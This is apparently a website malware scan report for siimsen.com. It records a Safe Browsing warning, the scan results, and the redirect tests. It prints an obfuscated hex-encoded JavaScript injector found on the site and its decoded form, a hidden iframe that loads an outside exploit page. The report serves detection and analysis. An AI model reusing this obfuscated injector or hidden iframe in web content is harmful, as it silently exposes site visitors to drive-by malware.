Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=siimsen.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://siimsen.com/ | 200 OK Content-Length: 2501 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
function oxsletpvxjt(qixfiot){var ddrbvc="";for(mpcrghwo=0;mpcrghwo<qixfiot.length;mpcrghwo+=2){ddrbvc+=(String.fromCharCode(parseInt(qixfiot.substr(mpcrghwo,2),16)));}document.write(ddrbvc);}oxsletpvxjt("3Cpsbmbvr6966psbmbvr72psbmbvr616D65psbmbvr20psbmbvr73psbmbvr7263psbmbvr3D22psbmbvr687474703A2F2Fpsbmbvr74756D75psbmbvr6Cpsbmbvr74psbmbvr75psbmbvr6F73psbmbvr75psbmbvr6Dpsbmbvr2Epsbmbvr63psbmbvr6F6D2F65702Fpsbmbvr696E64psbmbvr6578psbmbvr2Epsbmbvr7068psbmbvr7022psbmbvr207374796C65psbmbvr3Dpsbmbvr227669psbmbvr73psbmbvr69psbmbvr62psbmbvr696Cpsbmbvr69psbmbvr74psbmbvr79psbmbvr3A2068psbmbvr696464psbmbvr65psbmbvr6E3Bpsbmbvr206469psbmbvr73psbmbvr706C61psbmbvr79psbmbvr3A20psbmbvr6E6F6E65223E3Cpsbmbvr2Fpsbmbvr69psbmbvr66psbmbvr72psbmbvr61psbmbvr6D65psbmbvr3E".replace(/psbmbvr/g, ""));
Decoded script:
<iframe src="http://tumultuosum.com/ep/index.php" style="visibility: hidden; display: none"></iframe>
Antivirus reports:
http://siimsen.com/test404page.js | 404 Not Found Content-Length: 595 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: siimsen.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 12:14:26 GMT
Server: Apache
Content-Length: 2501
Content-Type: text/html
...2501 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: siimsen.com
Referer: http://www.google.com/search?q=siimsen.com
Result:
The result is similar to the first query. There are no suspicious redirects found.